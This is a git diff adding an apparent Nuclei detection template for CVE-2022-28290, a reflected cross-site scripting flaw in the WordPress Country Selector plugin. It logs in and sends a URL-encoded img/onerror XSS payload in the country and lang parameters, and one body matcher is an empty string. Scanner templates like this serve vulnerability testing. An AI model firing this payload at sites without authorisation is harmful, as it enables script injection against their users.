diff --git a/cves/2022/CVE-2022-28290.yaml b/cves/2022/CVE-2022-28290.yaml new file mode 100644 index 0000000000..d0b65f7dc5 --- /dev/null +++ b/cves/2022/CVE-2022-28290.yaml @@ -0,0 +1,50 @@ +id: CVE-2022-28290 + +info: + name: Country Selector < 1.6.6 - Cross-Site Scripting + author: Akincibor + severity: medium + description: | + The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting. + classification: + cve-id: CVE-2022-28290 + reference: + - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479 + - https://nvd.nist.gov/vuln/detail/CVE-2022-28290 + tags: cve,cve2022,wp,wordpress,wp-plugin,xss,wordpress-country-selector + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US + + skip-variables-check: true + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'country_selector_' + condition: and + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200